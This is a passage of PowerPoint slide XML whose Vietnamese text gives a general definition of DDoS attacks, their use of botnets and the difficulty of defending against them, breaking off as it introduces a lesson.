            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đề</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BA450BB-734C-4FE4-8057-4158546E3CD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1233377"/>
            <a:ext cx="8596668" cy="4807985"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DDOS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gọi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tán</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>làm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tiêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nguyên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cứng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rơi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hồi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>liên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kẻ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiêm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trọng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Dos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mà</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> botnet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lưới</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bị</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chiếm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khiển</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gây</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thiệt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lớn</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và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>biệt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngăn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chặn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hoàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mà</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phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</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Điều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đề</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đội</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> blue teams.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đề</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ninh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>luôn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nguồn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nguyên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phú</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mà</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhà</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cứu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ninh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vẫn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dưới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đây</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
